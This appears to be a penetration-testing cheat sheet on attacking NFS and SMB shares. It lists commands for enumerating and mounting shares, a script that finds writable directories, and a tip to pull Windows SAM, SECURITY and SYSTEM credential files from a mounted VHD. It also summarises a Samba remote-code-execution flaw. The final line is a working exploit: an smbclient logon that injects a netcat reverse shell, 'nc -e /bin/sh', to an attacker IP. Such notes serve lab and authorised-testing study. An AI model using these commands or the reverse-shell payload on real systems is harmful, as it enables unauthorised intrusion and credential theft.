NFS (Network File System) is a popular distributed file system. NFS shares are configured in the /etc/exports file. Remote users can mount shares, access, create, modify files. By default, created files inherit the remote user’s id and group id (as owner and group respectively), even if they don’t exist on the NFS server.
#Check for mountable shares
showmount -e 10.10.10.53
#Lists current mounted directories
df -k
ls /mnt
mount -t cifs -o username=notarealname,password=<Empty-for-null-login> //10.10.10.100/Sharename /mnt/local_dir_name
#Mount NFS Shares
sudo mkdir /tmp/tmpdir
sudo mount -t nfs 10.10.10.53:/Sharename
mount -t nfs [-o vers=2] <ip>:<remote_folder> /tmp/tmpdir -o nolock
#Unmount
sudo umount -a -t cifs
#Script for checking if share is writable
#writable.sh
list=$(find /mnt -type d)
for d in $list
do
touch $d/x 2>/dev/null
if [ $? -eq 0 ]
then
echo $d "is writable"
fi
done
//Mount the share
mount -t cifs -o 'rw,username=guest' //10.10.10.134/Backups localdirectory_name
//Mount the vhd file within this share
guestmount -a /mnt/remote/path/to/vhdfile.vhd -m /dev/sda1 --ro /root/bastion
Tip: Look for SAM, Security System files in C:\Windows\System32\config
Versions affected: All versions of Samba from 3.5.0 onwards.
Description: Malicious clients can upload and cause the smbd server to execute a shared library from a writable share.
Samba 3.x after 3.5.0 and 4.x before 4.4.14, 4.5.x before 4.5.10, and 4.6.x before 4.6.4 does not restrict the file path when using Windows named pipes, which allows remote authenticated users to upload a shared library to a writable shared folder, and execute arbitrary code via a crafted named pipe.
#Set up listener on Attacker's System
smbclient //victim_IP/tmp --option='client min protocol=NT1'
logon "/=`nohup nc -nv 192.168.119.174 4444 -e /bin/sh`"